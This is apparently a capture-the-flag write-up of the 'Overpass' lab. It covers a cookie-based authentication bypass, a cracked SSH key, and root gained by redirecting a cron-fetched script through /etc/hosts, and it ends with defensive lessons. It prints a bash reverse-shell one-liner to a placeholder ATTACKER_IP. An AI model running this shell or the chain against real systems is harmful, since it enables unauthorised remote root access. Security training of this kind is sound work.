Overpass
This engagement involved exploiting broken authentication logic to bypass login controls, retrieving sensitive SSH credentials, and leveraging a misconfigured cron job to achieve root-level remote code execution.
Reconnaissance
- SSH (OpenSSH)
- HTTP (Apache)
The web application was identified as the primary attack surface.
Authentication Bypass
Client-side JavaScript revealed flawed session handling. The application accepted any value as a valid session token.
SessionToken=exampleCookieManually setting this cookie granted access to the admin panel.
Admin Panel Access
Initial Access
An SSH private key was discovered within the admin panel. After cracking its passphrase, access was obtained as user james.
Privilege Escalation
A cron job executed a remote script and piped it directly into bash as root.
By modifying the /etc/hosts file, the domain was redirected to an attacker-controlled server hosting a malicious script.
bash -i >& /dev/tcp/ATTACKER_IP/1234 0>&1Impact
This attack chain resulted in full system compromise through authentication bypass, credential exposure, and root-level remote code execution via a misconfigured cron job.
- Client-side authentication should never be trusted
- Session tokens must be validated server-side
- Sensitive credentials should not be exposed in web apps
- Cron jobs should never execute remote scripts blindly
- Writable system files (like /etc/hosts) are critical risks